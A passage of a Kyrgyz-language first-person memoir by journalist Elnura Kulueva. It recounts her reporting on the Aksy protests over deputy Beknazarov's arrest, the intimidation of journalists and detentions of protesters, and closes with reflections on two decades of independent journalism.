да ушул жерге эле жайгашалы, түн ичинде мейманканага барбайлы деп чечтик. Эртең менен,14-январь күнү райборбордун чок ортосунда плакат көтөргөн элдер пикетке чыгышыптыр. Райондун жетекчилери менен баарлашалы деп райадминистрацияга кирсем секратарь кыздан башка бир да жан көрүнбөйт.
Кайра элдин алдына келсем милиция кызматкерлери элди курчай баштаптыр. Аксакал карыя райондун милиция жетекчиси, прокурорго кайрылып “Айланайындар, депутатыбызды алдыбызга алып келип эмнеге камалып жатканын өз оозунан угузуп бергиле, анан биз тарап кетебиз. Ишеним көрсөткөн шайлоочулары бар. Биздин талап ушундай” деди. Карыянын сөзүн үн жаздыргычка жаздырып жатсам УКМКнын кызыл күбөлүгүн көрсөткөн мырза мени четке чыгарып “сиз кайдан келдиңиз, күбөлүгүңүздү көрсөтүңүз” деп кирди. Күбөлүгүмдү көрсөттүм, унчукпай ары басып кетти. Элди сүрөткө тартып жатсам райондун милиция башчысы Кулуев жаныма келип, чыканактан алып “тартпаңыз” деп кирди эле “ой журналист кызга тийбегиле”деп эл арасынан ак калпакчан байке чыгып кыйкырып калганда мени коё берди. Түштөн кийин эл тарап кетти. Мен Бекназаровду коргоо штабына барып, депутаттын жардамчысы менен сүйлөшүп жатсам, арыкчырай бала шаша чуркап кирди “райондун прокурору менен биртоп кызматкерлер бу жакка келе жатышат. Журналист кызды тапкыла. “Азаттыктын” кабарчысын кошо алып келгиле деген сөздөрүн угуп калдым” деди. Штаб бир бөлмөлүү эле. Мени ваннанын ичине жашырып салышты.Тапырап беш-алты кызматкер кирип келишип, “Журналисттер кана” деп опузалашканы даана угулду. “Азаттыктын” кабарчысы бул жакта экен деп ал журналистти кирип келе жаткан жеринен кармашыптыр. “Мейманкананы карагыла, бүгүн ал журналистти Бишкекке жөнөткүлө” дегени даана угулду. “Азаттыктын” кабарчысын райондук прокуратурага алып барып бир сыйра сурак кылыптыр. Ошентип, биз кайтарууда болуп калдык. Эртең менен эл топтолгон жерге барсак солдаттар кыдырата тизилип калыптыр. Таң заарда орозосун жаап келген аксакалдар, апалар сүйлөй баштаганда эле четинен сүйрөп машиналарга сала башташты. Окуянын мындай болуп кетээрин күткөн эмеспиз. Милиция бөлүмүнө пикетке чыккандарды камай баштады, кеч күүгүмгө чейин ошол жерде турдук. Четинен тил кат жаздырып, бирден чыгара баштады. Мурду кырдач жигит чыгып “Ажатканага чыгарбай камап, 80 жаштагы абышкабыздын орозосун сыйлабай шымына коё бердиртти. Өзүбүздүн балдар аксакалын сыйлашкан жок. Ыйманы жок тура. Биз эми чыгабыз” деп ызырынды. Дагы бир апанын колу сынгыча сүйрөшкөнүн көрүп элдин кыжырдануусу күч алды. Мен ошондо райондун, күч стуруктуранын жетекчилери эл менен сүйлөшүүлөрдү жүргүзүшө албаганына көзүм жеткен. Элге колдонгон методдору ого бетер элдин кыжырдануусун жаратып жаткандарын билип туруп ошол кадамдарга барышкан. Ошол учурда элдин койгон талаптарын аткарып, эл менен иштешсе болмок. Кызматтарынан коркуп, элден качкан факт өздөрүнө таш болуп тийбеди беле. Менин коопсуздугумдан чочулап түнү шаарга таксиге салып ийишти. Машинанын алдыңкы орундугуна олтурсам штаб жетекчиси: “Бекназаровду бошотуу боюнча 2 миң кол топтодук эле, Бишкектегилерге жеткирип бересизби, абайлаңыз, артыңызда СНБнын балдары жүрөт” деди. Муну уккан таксист чочуп кетти: “Эже, тынчпы мага эч нерсе болбойбу “деди, мен машинанын полигине ал кайрылууну салып “Коркпоңуз сизге тиешеси жок” дедим. Биздин машина жылган соң артыбыздан ак волга автомашинасы түшүп алды. Мен ошондо өзүмдү “партизанка” катары сезгемин. Качан бизди токтотуп, поликтин алдындагы топтогон кагаздарды алат деп чочулап, күзгүдөн карап бара жаттым. Кербенден чыккандан кийин ал машина артта калды. Бир журналисттен кутулдук дешти окшойт. Мына ошентип Аксы окуясы барган сайын курчуп бара жатты. Жыйынтыгында элге атылган ок алты адамдын өмүрүн алып, ачкачылык жарыялаган Шераалы Назаркулов каза тапкан. Кандуу окуядан соң Азимбек Бекназаров бошотулуп, биринчи түз байланышты “Ааламга” уюштурганда телефон чалууларга жооп берүүгө үлгүрө албай жатканынын көрүп, эркин гезиттер элге туура маалымат бергендин жеңиши ушул экенин түшүнгөм.
20 жылдан бери капастагы куш болбой, эркин гезиттерде журналисттик миссиямды аркалап келе жатам. Акыйкаттуулук коомдо орносо, коомдук пикир жаратуучу катары менин да салымым бар экени баардык нерсени жууп кетет деген ойдомун. Анткени ач суукта белде калсак да менин куш кабарым окуя өзөгүн өзгөрткөн…
Элнура Кулуева, журналист

Меню